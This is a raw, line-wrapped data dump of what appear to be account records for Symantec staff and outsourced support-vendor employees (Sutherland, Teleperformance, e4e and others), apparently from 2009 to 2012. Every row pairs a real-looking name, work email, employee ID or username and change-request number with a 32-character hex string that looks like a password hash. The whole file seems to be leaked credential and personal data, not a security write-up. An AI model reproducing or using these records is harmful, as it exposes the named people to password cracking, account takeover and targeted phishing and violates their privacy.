Sutherland,05634504bb42296aeb881865f456fa1e,Hipolito,<blank>,089680,Airine,NULL,
NULL,NULL
242-4803-8532-c4a7c0bbadfe,<blank>,073791,Ming_Chai@symantec.com,e4e,ac8f4400008
41e517ad6376be9d39ea0, Miranda,<blank>,Anoop_Miranda,Anoop ,NULL,NULL,NULL
27fa-44cf-b217-6c9cf056463e,RM-10feb 2012-CRQ000000551726,<blank>,tools_id@syman
tec.suth.com,Sutherland,46f9ffb05a817eac1beca9ff7704a2df,Ghosh,<blank>,124770,Pr
itam ,NULL,NULL,NULL
567b-443d-a464-0557d31f5fc2,CRQ000000241079 PBP 15/04/2011,<blank>,Purushotham_G
untumad@symantec.com,Symantec,782a4ff3e174a9402653a52db3011126,Guntumad,<blank>,
114445,Purushotham,NULL,NULL,NULL
f74c-48ec-881c-c941341f2152,CRQ000000241079,<blank>,Pronoy_Roy@symantec.com,ksc-
04/15/2011,12114fcef130f881324aa05d0920475a,Roy,<blank>,114409,Pronoy,NULL,NULL,
NULL
adfc-4938-9480-da168d09503a,CRQ000000241079,<blank>,Renato_Rodrigues@symantec.co
m,KSC-04/15/2011,60b8a1e0366d9027a67870d5aa628292,Rodrigues,<blank>,114496,Renat
o,NULL,NULL,NULL
e5f1-450f-94dd-f776650eabd8,<blank>,<blank>,aumutoni@symantec.teleperformance.gr
,TPG,9736740bbe9f73db8512f615daaa6567,Umutoni,<blank>,ange_umutoni2,Ange,NULL,NU
LL,NULL
7c6a-4bca-93e1-3aa6d1dceead,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568706,9360504109d71c4c2f5532f66e66df1c,Gatchalian Gruspe,<blank>
,125296,Rodel,NULL,NULL,NULL
624-4a71-a41a-033d58896ccc,<blank>,073784,Ming_Chai@symantec.com,e4e,2546eb9d434
71bb0f74280efdf63d093,Sathish ,<blank>,Muthuswamy_Sathish,Muthuswamy,NULL,NULL,N
ULL
649-4d2e-9267-e563482e53a5,<blank>,89271,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",0feda6b502cc890b3899517a1d73a6b1,Ch,<blank>,srikanth_ch,S
rikanth,NULL,NULL,NULL
9b53-4a03-b77f-a7a09c3870d3,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568735,cd306a157a97127b75e339ccd71c0635,Ann Maballo Ramirez,<blan
k>,125304,Julie,NULL,NULL,NULL
6ca7-41f7-910d-9d6ddad16e26,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568746,e39e21f136201fa48ff374fcfd611be7,Datu Senupe,<blank>,12530
6,Roselyn,NULL,NULL,NULL
93b4-4fad-b3a3-a6cb03962f28,AY 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,233843689d21a1ee0faed12d316b9f92,Marian,<blank>,074288,Senan,NULL,NULL,NU
LL
e15-4170-bbce-64ff9189fa65,<blank>,073722,Ming_Chai@symantec.com,e4e,691190e8cf8
ef2f51b0543f4723de178,ramaswamy,<blank>,Varadharaj_ramaswamy,Varadharaj ,NULL,NU
LL,NULL
5cc-4fcb-9e7f-ebb19642f9ca,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,d4
b402515dad1fd11d4d96563af623af,Park,<blank>,076505,Junbok,NULL,NULL,NULL
1a2-4508-b18d-889f7e13f96f,<blank>,073570,Ming_Chai@symantec.com,e4e,df177f6594f
95ad06260724770498611,Thomas,<blank>,Anu_Thomas,Anu ,NULL,NULL,NULL
1e68-4c28-b131-572144fb3ed0,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570851,0dd374b5de95ace923857fc9d61c1479,Sruti,<blank>,125347,Saran
ya,NULL,NULL,NULL
7273-4c62-ae1c-2650ecfc622f,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,15af2e3ce153a8b9feb526480684b903,V,<blank>,088580,Deepthi,NULL,NULL,NULL
746-4666-b33c-ba40a3e265f1,<blank>,075479,ming_chai@symantec.com,sutherland,6eb4
5cf794d7de287b77b82a943af40f,Amor Polpol,<blank>,Sandra_AmorPolpol,Sandra,NULL,N
ULL,NULL
45b5-4b27-adcf-9e33c9520624,<blank>,2665612,symantec_2nd_maa@tp-tec.nl,TPH,f3bb0
d7eec0080ca7fbfa05d54a58026,Geraets,<blank>,085582,Martijn,NULL,NULL,NULL
468-4e8f-b5cd-64d48ab249f3,16/04/2010 - SPJ,INC153788,Tools_id@symantec.suth.com
,Symantec,6e70d0185173c8a6a0da41bc95acd80c,Anagoni,<blank>,089652,Shashikanth,NU
LL,NULL,NULL
7e8-4f17-8547-9cc4c3654414,<blank>,86663,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",4ce4cd07ab73cf20813228a21831cc73,Shibi ,<blank>,saiyed_sh
ibi,Saiyed,NULL,NULL,NULL
e17-4fd3-8b7a-6193d6024e0b,<blank>,<blank>,vinod_pore@symantec.com,Symantec,b727
c6686039b7bbd237aba00814db9b,Pore,<blank>,vinod_pore,Vinod,NULL,NULL,NULL
d345-4233-b69d-1d5c0e7dd14e,SRB 24.08.2010,INC000000249136,tools_id@symantec.sut
h.com,Sutherland,4a19cf0264a02a8eb2b28851b1105eab,Reddy,<blank>,094901,Srikanth,
NULL,NULL,NULL
b83-4d83-80dc-ba50e795affe,<blank>,090379/2633282,Tools_id@symantec.suth.com,Sut
herland,4a36d61b0069882fade81fc21bcd92b9,Sitlani,<blank>,deepak_sitlani,Deepak,N
ULL,NULL,NULL
385-42bc-a76f-3b41f7ed275b,<blank>,090547/2614953,Tools_id@symantec.suth.com,Sym
antec,9f0956d390808f8d037440f970469340,Solito,<blank>,earvin_solito,Earvin,NULL,
NULL,NULL
3ce-4293-8625-de76a4f1a6ea,<blank>,090549/2614953,Tools_id@symantec.suth.com,Sym
antec,45be7c1c05099815829eef405d56e898,Lopez,<blank>,julia_nenalopez,Julia,NULL,
NULL,NULL
6a3b-4563-8d00-82a28b9f75a8,<blank>,EMPROV,Valerie_David@Symantec.com,<blank>,d9
345d763fc90fa79eda294f521755f0,Langevin,<blank>,093687,Aurele,NULL,NULL,NULL
d46-4067-890c-5fe5ac958bb4,<blank>,<blank>,Richard_Veader@symantec.com,Symantec,
2481be32f430315e8b532398b78c5116,Veader,<blank>,Richard_Veader,Richard,NULL,NULL
,NULL
aaf-4bf3-8480-dac2adee2c23,<blank>,<blank>,Lewis_Brown@symantec.com,Symantec,335
672f6174fcce384a464343a6b0847,Brown,<blank>,Lewis_Brown,Lewis,NULL,NULL,NULL
27da-433b-bc9e-8ef8c3e5d231,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,558865412ef94753ba270ce1c6cfef56,Parameswaran Pillai,<blank>,075755,P
raveen,NULL,NULL,NULL
de02-40ac-ad52-bcef93e2705f,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,9e79a9c04279c17c10003c6179715a8c,Krishnan,<blank>,075769,Sathesh,NULL
,NULL,NULL
3295-4fec-bb7c-292062f52d21,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,705d149c537598c835cc0618030da86b,Mathew,<blank>,094256,Renny,NULL,NULL,NULL
7113-41eb-a402-1b24ab3671c6,PM - 6/2/2011 - CRQ000000269139,<blank>,VIVEKANANDH_
N@symantec.com,<blank>,c754ae4571ed6fc434830d1af39b0830,N,<blank>,114977,VIVEKAN
ANDH,NULL,NULL,NULL
12e1-4c22-b0d1-de8e43dfd562,CRQ000000298996--vmd--12/07/2011,000-000,Ritesh_Jha@
symantec.com,Symantec,5acfaf4d6c711024db9bfa3bc4a195ff,Jha,<blank>,117219,Ritesh
,NULL,NULL,NULL
8f0-4176-a8b9-24b9f9299634,<blank>,075496,ming_chai@symantec.com,sutherland,8b43
59439a5c9cd2377473eddcd380a3,Gil A. Quilloy ,<blank>,Mark_GilAQuilloy,Mark,NULL
,NULL,NULL
172f-45f9-a661-c31076c01526,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,3
7d9432d7767a8504b917f9b6cd6dd25,Sardido Magboo,<blank>,111111,Geneviv,NULL,NULL,
NULL
e3a-4803-bd15-da3551779b62,<blank>,090408/2633288,Tools_id@symantec.suth.com,Sut
herland,57aec91c5a7031237ba2909161d2a19a,Naryani,<blank>,sunil_naryani,Sunil,NUL
L,NULL,NULL
1e6-42bd-b63c-5d57cf2664b9,<blank>,090421,Tools_id@symantec.suth.com,<blank>,cda
d30311e3bac3b98e0391ae59f4f78,Kishore,<blank>,venkat_kishore,Venkat,NULL,NULL,NU
LL
53c2-4b33-86c8-e49b3c0632e7,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,fd58b82cc2f3a4da70c1a8255c472e38,Lucila,<blank>,095030,Chona Mortega,NULL,NULL,
NULL
86fd-4447-ae8b-1197f13b23e1,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,6
aa4f1688d752d9d6f24f424d96cac46,Sampedro Gordo,<blank>,111123,Ramil Angelo,NULL,
NULL,NULL
34dd-4ec8-97a7-4caff02a1396,02/06/2010 - SPJ,INC184885,Tools_ID@Symantec.suth.co
m,Sutherland,e10595f4fd6db29b15183d16cf823677,Krishnan,<blank>,085991,Babu S,NUL
L,NULL,NULL
c1de-41a1-9fe7-196256c9c51d,<blank>,<blank>,elee@pctools.com,Symantec,b8e5166538
45784559ff8d736d1a2aeb,Lee,<blank>,eric_lee,Eric,NULL,NULL,NULL
301c-4316-bbce-51b9a0fd2cf6,sms 06.10.2010,<blank>,tools_id@symantec.suth.com,su
therland,e07935f270d8884e975508d3dd1c433c,Munavarin,<blank>,109215,Wahidahamed,N
ULL,NULL,NULL
96e5-48de-9091-295f44eaddaa,<blank>,<blank>,Dario_Sorgente@symantec.com,<blank>,
944099bd715bf2dca9b9ad2cf25a7642,Sorgente,<blank>,019642,Dario,NULL,NULL,NULL
5db5-4204-9470-e2b78020f07e,WS 10-08-2010,INC000000238892,jane_huang@symantec.co
m,Symantec,00c5b64142f6911d30790ace8ec643e4,Huang,<blank>,019099,Jane,NULL,NULL,
NULL
331-4582-86ee-c73668ba6fef,<blank>,<blank>,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",721f3d5622f79c0d0dfab6f52d4e26c1,Turgeon,<blank>,Andre_
Turgeon,Andre,NULL,NULL,NULL
27f9-4daf-82f6-e1b86644c9c3,CRQ000000191288 SP-26/1/2011,<blank>,tools_id@symant
ec.suth.com,<blank>,03619ddceeaef2cfe08038353b59a79e,Basu,<blank>,112536,Balgalu
,NULL,NULL,NULL
e52e-4a4e-b5b2-3a2c8ba3d00e,CRQ000000192027-BKK,<blank>,accounts@symantec.telepe
rformance.gr,<blank>,28cf16989079f4dd758d2e7596476ce9,Kochila,<blank>,071483,Ann
a,NULL,NULL,NULL
cb4-41da-aeb5-283bad26afbd,<blank>,075474,ming_chai@symantec.com,sutherland,c879
2cb6ff1e28a361a4b2027eeb81ec,Ubas III,<blank>,Micheal_UbasIII,Micheal,NULL,NULL,
NULL
332e-4915-a7d8-0d745763c618,<blank>,<blank>,accounts@symantec.teleperformance.gr
,Teleperformance,e300e3879c5a00adbe9af201ce6b5f9a,Banas,<blank>,109570,Magdalena
,NULL,NULL,NULL
5bb-4adb-8750-86d4aca08e7f,<blank>,076168,Tools_id@symantec.suth.com,sutherland,
4492ca88796381ece36ec7bb657969be,Hibonada,<blank>,Marben_Hibonada,Marben,NULL,NU
LL,NULL
df77-4e86-b918-e46a0f3b47d3,<blank>,EMPROV/10010,accounts@symantec.teleperforman
ce.gr,TPG,f0bb3f9cbef627e02b499a39611cead5,Tonn,<blank>,094539,Bernd,NULL,NULL,N
ULL
277-4c64-98bb-0432dfe2ba35,<blank>,<blank>,Nigel_Roane@symantec.com,Symantec,779
7dd0ba2a88041896603048567e6a6,Roane,<blank>,Nigel_Roane,Nigel,NULL,NULL,NULL
8d70-4a24-ba93-f5c52098a2f7,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,f08d10698ca5eb0515fb8e39229b1280,Rogerio,<blank>,110058,Enrico,NULL,NULL,NU
LL
1778-44cc-a927-c953b1eff425,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,df6f61e49bdfcc718803fdefca864ce9,Deborja,<blank>,110070,Marichele,NULL,NULL
,NULL
75dc-47a9-b999-b8ba433ba67f,<blank>,CRQ000000002060,David_Ishida@symantec.com,Sy
mantec,9045cc472c97b6c17a3716a84822fd35,Ishida,<blank>,093549,David,NULL,NULL,NU
LL
b97-4cb5-9b95-3c62f13ed478,<blank>,<blank>,symaccounts@e4e.com,e4e,ee8df46d47293
e8e41947f0235177528,Sharma,<blank>,Laimayum_Sharma,Laimayum,NULL,NULL,NULL
f3d1-47c4-8dab-373cd88b3660,<blank>,INC151150,accounts@symantec.teleperformance.
gr,Teleperformance Greece,68ac8f9de597b2f44787107103cd1e87,Grudowska,<blank>,051
426,Maja,NULL,NULL,NULL
142f-4d34-be89-0fc57f9537f2,SRB 18.05.2010,INC 151080,tools_id@symantec.suth.com
,Sutherland,d6074536a56f8b2d8d8e04ca24868dcc,Abellano,<blank>,085765,Xenia,NULL,
NULL,NULL
482-42d3-ba2a-a9b4271c97a0,<blank>,<blank>,Tools_id@symantec.suth.com,"Sutherlan
d Global Services, Inc.",e97fa7d7b6395f4eae72eb8842d064a9,Willet_Livingstone,<bl
ank>,Charlene_Willet_Livingstone,Charlene,NULL,NULL,NULL
24a2-488a-829d-e5dfe79c74bd,CRQ000000413837--VMD--21/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,6bd312af6e31fcd98f333e7c214717a9,Stephenson,<blank>,1
22513,Georji,NULL,NULL,NULL
4c60-44f0-9e90-6c5bee6fe7de,24/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,bee3adc67ee9d9e982248fd3e8a944af,CadungogFlorido,<blank>,105480,Fred,N
ULL,NULL,NULL
7e8-422b-878d-0aae189d4586,<blank>,083622,accounts@symantec.teleperformance.gr,T
PG Archived,53f8d5db649d35e7a21a4a4630b435d8,Derdelakos,<blank>,vasilios_derdela
kos,Vasilios,NULL,NULL,NULL
ac2-4ef4-9d22-1f0573a9907e,<blank>,2614953,Tools_id@symantec.suth.com,Symantec,0
44f125c5b477a33c37b1a9bc452c95a,Mosqueda,<blank>,lindsley_mosqueda,Lindsley,NULL
,NULL,NULL
e34-490d-a004-9b7ba3c1cf90,<blank>,89808/2633284,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",67f26268a1d2601e48512a72902ce4b8,Shaikh,<blank>,a
sad_shaikh,Asad,NULL,NULL,NULL
e87-40d2-a8a2-6fa06d244a3b,<blank>,2614952,Tools_id@symantec.suth.com,Symantec,a
d38c0d6dd51dfb9b59e75f369cb587a,Ballener,<blank>,mandel_ballener,Mandel,NULL,NUL
L,NULL
4ffb-4963-b46a-fe7f9c5a1611,<blank>,<blank>,aravindraj_ir@SUTH.COM,PM - 2/22/201
2 - CRQ000000561735,f4d1f5267a0ebc6816ebd548f829e43b,IR,<blank>,101840,Aravindra
j,NULL,NULL,NULL
b92-4f60-85df-4e6d84f0afe1,<blank>,080918,ming_chai@symantec.com,sutherland,76f8
4bffad280c1d6b400cbaeb68e2b6,Thompson,<blank>,Jeff_Thompson,Jeff,NULL,NULL,NULL
7f3a-452d-8ab9-016c43290503,sms 01.10,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,e062de8967fb74aab16746ffb7521a51,Jayasekar,<blank>,102084,Dinesh,NULL
,NULL,NULL
373d-4900-ae4f-f05782bce9ca,<blank>,<blank>,wilson_jebanesan@SUTH.COM,PM - 2/22/
2012 - CRQ000000561735,4e10a04e829a5001303b6015cff3069e,Jebanesan,<blank>,091234
,Wilson,NULL,NULL,NULL
e15d-4359-897f-34e030926b15,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568738,9aae0603c21afdf735a740cb355105fe,Louise Olipas Reyes,<bla
nk>,125305,Jazelle,NULL,NULL,NULL
95f8-41e6-ba18-17288d7ec733,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570873,b35f941d8db15af4dda6929b9edc867c,Das,<blank>,125353,Prabhu,
NULL,NULL,NULL
c316-41cf-ba87-273adc941f11,CRQ000000589240--vmd--13/03/2012,000-000,mike_dyson1
@Suth.com,Sutherland,6f251fda8bc9dc1b009c4c630faebc92,Dyson,<blank>,222462,Mike,
NULL,NULL,NULL
9745-4740-ac13-acfa6c50129b,SRB 12.08.2010,INC000000241142,Tools_ID@Symantec.Sut
h.Com,Sutherland,af19138898088644d3a400f26af118dd,AlboresDalde,<blank>,105473,Le
andro,NULL,NULL,NULL
ff17-4438-b386-fe2eadc02349,CRQ000000589225 SP 13 Mar 2012,999-999-9999,mufaddal
_masalawala@symantec.suth.com,Sutherland,9539e0db02f31b9859ae9a5ee9cee690,Masala
wala,<blank>,222406,Mufaddal,NULL,NULL,NULL
dc6-42dc-9d98-fce61a2ef4d0,<blank>,<blank>,raghvendra_redyy@symantec.com,<blank>
,88cf2a7eeae5666f5b529a7b387d2b98,reddy,<blank>,raghvendra_reddy,Raghvendra,NULL
,NULL,NULL
d4cf-43a7-863a-909c3bb8f549,CRQ000000218944 - PM - 15/3/2011,<blank>,tools_id@sy
mantec.suth.com,<blank>,1d991005834b6758ff0fa7f99d02aac8,Tama,<blank>,113935,Alm
ira,NULL,NULL,NULL
4949-49ec-b043-2ebed9a5ca9d,NA 29th june 2011,CRQ000000290469,accounts@symantec.
teleperformance.gr,<blank>,0ab9eeeb262a59a92162e4a832acf806,Constantinidis,<blan
k>,117833,Alexandros,NULL,NULL,NULL
ab0c-4bc3-b273-9a1174424c16,CRQ000000298996-VMD-12/07/2011,000-000,Vishal_Srivas
tava@symantec.com,Symantec,8cc6ed19037cc56644051b9f6ef86e1e,Srivastava,<blank>,1
17215,Vishal ,NULL,NULL,NULL
899f-4f99-9569-abc5babb5f66,CRQ000000542034--vmd--06/02/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,9eaafd1b5c3911ea9a255ae4653ebeab,Nandan,<blank>,12468
1,Vijay,NULL,NULL,NULL
30eb-4e88-81f8-d45e8f7088e5,RM-16feb-2012-CRQ000000559131,<blank>,arinis@symante
c.teleperformance.gr,<blank>,ed0a8ad589b1812229c761b5050034d9,Rinis,<blank>,1248
38,Alexandros,NULL,NULL,NULL
b02-449e-9330-226593db2e28,<blank>,076167,ming_chai@symantec.com,sutherland,4289
3a7f92a724f1c631cf403365abde,Lao,<blank>,Alexander_Lao,Alexander,NULL,NULL,NULL
a0a-4493-8f15-cf320c4bdb9f,<blank>,89162,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",32f9d685a807a28a13000e9caaa92b9c,PuthuyaPurayil,<blank>,s
ooraj_puthuyapurayi,Sooraj,NULL,NULL,NULL
6f8c-4671-85e6-e8245d405212,<blank>,<blank>,Jayanthi_R@symantec.com,<blank>,a766
58ca4e92f5095dd012e25e733810,R,<blank>,107013,Jayanthi,NULL,NULL,NULL
a1cc-4d39-9448-b29f827c6e3f,<blank>,<blank>,vaishnavi_gantasrika@SUTH.COm,PM - 2
/22/2012 - CRQ000000561735,c10fdcdf2211aafe24a0ff78002724a5,GantaSrikanth,<blank
>,101841,Vaishnavi,NULL,NULL,NULL
5a0a-4411-b9b6-7e6a46d0e7fb,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb27
2012-CRQ000000570858,59c9f3aefb43362d6f68111804d5dd07,Lawley,<blank>,125350,Jess
y,NULL,NULL,NULL
6348-48aa-a9ee-f70e0f8a8638,CRQ000000589207 SP 13 Mar 2012,999-999-9999,didin_ra
vikumar@symantec.suth.com,Sutherland,55735fdf5482983ea3fd5da955264d99,Ravikumar,
<blank>,222396,Didin,NULL,NULL,NULL
a06a-4b59-99ce-c0468718df0b,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - CRQ000000591330,a144d16b86c7bbe8b40882a8590eda49,Iyer,<blank>,222438,C K
Ganesh,NULL,NULL,NULL
a65d-4dcc-8ec0-3e6dcad00b24,<blank>,<blank>,tools_id@symantec.suth.com,PM - 3/14
/2012 - CRQ000000591360,acd9562037f64ecb588b577a61d48402,Tambe,<blank>,222443,At
in Gopal,NULL,NULL,NULL
bc2-4f0f-8d8a-f8aa10335d9d,<blank>,080944,ming_chai@symantec.com,sutherland,20f2
d94d14ee92f0b07924f9b1b704c7,Olar,<blank>,Stephen_Olar,Stephen,NULL,NULL,NULL
41e-4dca-a24f-959d28412a37,<blank>,080611,ming_chai@symantec.com,sutherland,f7fd
bfefb4e6361101cc068a415da506,MarfulSay,<blank>,Alvin_MarfulSay,Alvin,NULL,NULL,N
ULL
367-4b3f-80b7-a2c526e43326,<blank>,86210/2632350,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",862d6d54d35de0022bd2f363958de0c0,Judson,<blank>,n
ixonraj_judson,Nixonraj,NULL,NULL,NULL
2ca-4c5d-a643-350606cdf31e,<blank>,85737,Tools_id@symantec.suth.com,Sutherland G
lobal Services,80f0bffee18ec8eb45d2420453c0940b,Rocheleau,<blank>,joel_rocheleau
,Joel,NULL,NULL,NULL
c4a2-4154-bd95-da7e2e261398,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,0d0eaea49b640f9e48d90e41dcd79c34,Mani,<blank>,senthil_mani _cc,Senthil ,N
ULL,NULL,NULL
c30c-4c51-8318-b480d28a4365,<blank>,<blank>,kziogas@teleperformance.gr,RM-22feb
2012-CRQ000000565323,2590e5f51cbf92c06721683bb6aaec8b,Ziogas,<blank>,125222,Kleo
n,NULL,NULL,NULL
efa3-475e-ba33-5fae85f46fc9,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b874ccf7867a3ac8005ef67e5d877603,S,<blank>,088448,Varada,NULL,NULL,NULL
310-40ff-a2d3-4eb2f68877dc,<blank>,86067/2635106,Tools_id@symantec.suth.com,Suth
erland ,bc1fa0450412d547e1632e2a8397708c,D''''''''Cruz,<blank>,linson_dcruz,Lins
on,NULL,NULL,NULL
b33f-4826-9e1e-74fe1c9dc921,CRQ000000589247--vmd--13/03/2012,000-000,balaji_raje
ndran@suth.com,Sutherland,f2e7d210f28c0c64753a6b41dc4a4782,Rajendran,<blank>,222
463,Balaji,NULL,NULL,NULL
318a-436d-8795-5e2966f2aa0e,CRQ000000589243 SP 13 Mar 2012,999-999-9999,navin_lo
ndhe@symantec.suth.com,Sutherland,89484b3ef154dc86bf179ab65cdc8f64,Londhe,<blank
>,222417,Navin,NULL,NULL,NULL
4caf-4d2c-8dea-2653a257033a,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,e08685f1d241b25b1b97e82b722f0543,KA,<blank>,shifanaz_ka_cc,Shifanaz,NULL,
NULL,NULL
060-4a66-9831-f5965ba1e976,<blank>,070222/2581502,accounts@symantec.teleperforma
nce.gr,TPG,2cf4c62febf6c62fa0a58526a8781c3f,Balilaj,<blank>,070222,Valentina,NUL
L,NULL,NULL
2029-4bf8-8258-fa7988a83643,CRQ000000589250 SP 13 Mar 2012,999-999-9999,jennicks
_rajiah@symantec.suth.com,Sutherland,cad864cbc9f0399cba28ea65d40f4b14,Rajiah,<bl
ank>,222426,Jennicks,NULL,NULL,NULL
075b-4619-b275-ec2327c5fcfd,bpr,INC000000066985,tools_id@symantec.suth.com,suthe
rland,3e9e9df3e6dadce00151e099b9ced658,Pousteen,<blank>,086158,Briji,NULL,NULL,N
ULL
6706-4844-b981-725b0d92750d,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591393 - PR - 14th March 2012,8a7b182d675f9f44c7e86d00e7ebc422,Daquiz,<blank>,22
2413,Claire Jeanne,NULL,NULL,NULL
9cf1-4dad-adfd-19dffc63b403,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591419 - PR - 14th March 2012,b8e48c35f4194b30cc29f60c92a37370,Faustino,<blank>,
222416,Paul Ryan,NULL,NULL,NULL
3855-4e54-a572-1edea576d7d8,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591437 - PR - 14th March 2012,da01ed044ba48e6964e7a1314509e3a8,Fernando,<blank>,
222418,Mark Lyndon,NULL,NULL,NULL
b81a-4a08-b083-e5510e4de14b,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
591446 - PR - 14th March 2012,0fe9adcc6870fb33bb951cc06a1c9912,Panganiban,<blank
>,222421,Roxane,NULL,NULL,NULL
a753-4be2-90cf-b03cc63f2084,28/01/2010-SPJ,EMPROV,Tools_Id@Symantec.Suth.com,Sut
herland,001d958692941f7e7ed17055b1e030ac,Sayed,<blank>,090344,Wajahat Ali,NULL,N
ULL,NULL
f71a-4565-b4db-84b796438821,"CRQ000000592922 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,21e86047430239290d0d8fec2e501b76,Gianani,<blan
k>,222481,Tushar,NULL,NULL,NULL
7ae7-4d7d-8d26-4b6083a9d35f,"CRQ000000592931 CLNP Mar 15,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,3f4eff5bc15c785c96745133ca70a831,Bora,<blank>,
222485,Nittu,NULL,NULL,NULL
0a54-46ef-a1c0-f97439c56395,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,d
2f77ac47d7a267ca73ead7c05bcf1f4,Sivdasan,<blank>,110823,Saju ,NULL,NULL,NULL
92b7-42e4-bb50-57ef9ddd93e8,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,6e31529612a46acc5f24cfb708ac29ce,B,<blank>,vinodh_b_cc,Vinodh,NULL,NULL,N
ULL
ddd4-4415-81b0-a280e1d68307,<blank>,<blank>,randolph_augon@symantec.com,Symantec
,39e705f19c0bd4053d37b9dc5012259c,Aguon,<blank>,randy_aguon,Randy,NULL,NULL,NULL
f77f-4f68-ba6f-e5236e1d7e7b,<blank>,<blank>,mvandeheuvel@teleperformance.gr,RM-2
2feb 2012-CRQ000000565315,1b346172095306986477f5a9c8fdafe5,Van Den Heuvel ,<blan
k>,125221,Maurice,NULL,NULL,NULL
5b0-42e8-bd3e-fe831ff2da10,<blank>,86244/2632350,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",73ce89992d3543522634a06aed46b841,Gopalakrishnan,<
blank>,mohanakrishnan_gopal,Mohanakrishnan,NULL,NULL,NULL
5316-4b33-b0ed-1eafa401f7f2,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 24
2012-CRQ000000568717,1952594aa0945e5075acdf33845177d1,Jay Bulusito Mariano,<bl
ank>,125299,Ivan,NULL,NULL,NULL
c0be-4f70-881f-8b0a158a880d,CRQ000000228849-KD-29-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,b7486d474a894bec9759a80e2dbeae8c,Gopalakrishnan,<blank>,
098593,Srinivasan,NULL,NULL,NULL
1999-4d77-b9a1-9cff208d668d,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,dd903c52db67e9039d5f2257541f27b4,Anbalagan,<blank>,089308,Maheshwar
an,NULL,NULL,NULL
8b42-4766-91c0-becf403cb96d,CRQ000000228849-KD-29-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,86f25d6885839a34a4fc4b46e23d9b80,Rsuth,<blank>,099877,Sa
thish,NULL,NULL,NULL
16c-4bcd-a527-eef785603894,<blank>,080978,ming_chai@symantec.com,sutherland,fa71
e0f3f689d16d9c899ff81782c1bb,S Boudreau,<blank>,SkyLyn_SBoudreau,SkyLyn,NULL,NUL
L,NULL
0d32-4c89-9251-0ce3df56fa82,BPR-13-01-10,EMPROV/INC87845,accounts@symantec.telep
erformance.gr,Teleperformance,1aa4befe116c7ab6dac39af37872754b,Bola,<blank>,0710
78,Patrick,NULL,NULL,NULL
31ae-462b-b508-ab70ebedfc8a,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,f4ae5c386b544724fd0dfe7b22b761f7,Singh,<blank>,091714,Kalpana,N
ULL,NULL,NULL
a90-4b0e-b90b-3f58c7348904,<blank>,EMPROV,tools_id@symantec.suth.com,Southerland
,ce7ff661f01c52925a02dd5cbf16ffa5,V,<blank>,092191,Sreelatha ,NULL,NULL,NULL
8f5-43cc-be70-321d9b75896d,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,c8
e13ad7a0a0ae5010283de76fc1b9a6,Ishiwata,<blank>,084530,Ryoko,NULL,NULL,NULL
32c3-4d3f-947e-cfad18f49d1a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,75e517e75ae57665f9ee32d30039fda4,Ramani,<blank>,087413,Arasananthan,NULL,NULL,N
ULL
44e6-4bc4-970f-cb1335bcb886,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,40abac237358f44a81a29f518d05b773,Naila,<blank>,suresh_naila_cc,Suresh ,NU
LL,NULL,NULL
b19-4e71-ac0c-7903bbce2a84,<blank>,081000,ming_chai@symantec.com,sutherland,6159
39dffaa914ac77b809da39db804e,Boivin,<blank>,Carolyn_Boivin,Carolyn,NULL,NULL,NUL
L
37d-4c39-a1ff-b2fa24871cb6,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,PCDoctor,9e
dd2047f78ff1a9e141d7da0a748625,Cho,<blank>,081215,Ai,NULL,NULL,NULL
00f6-43bc-93b9-a6129ba1c88a,RM - 19 dec 2011-CRQ000000459941,<blank>,tools_id@sy
mantec.suth.com,<blank>,52d30c162848db56cdbc802bc078cdac,Mayekar,<blank>,123223,
Sachin,NULL,NULL,NULL
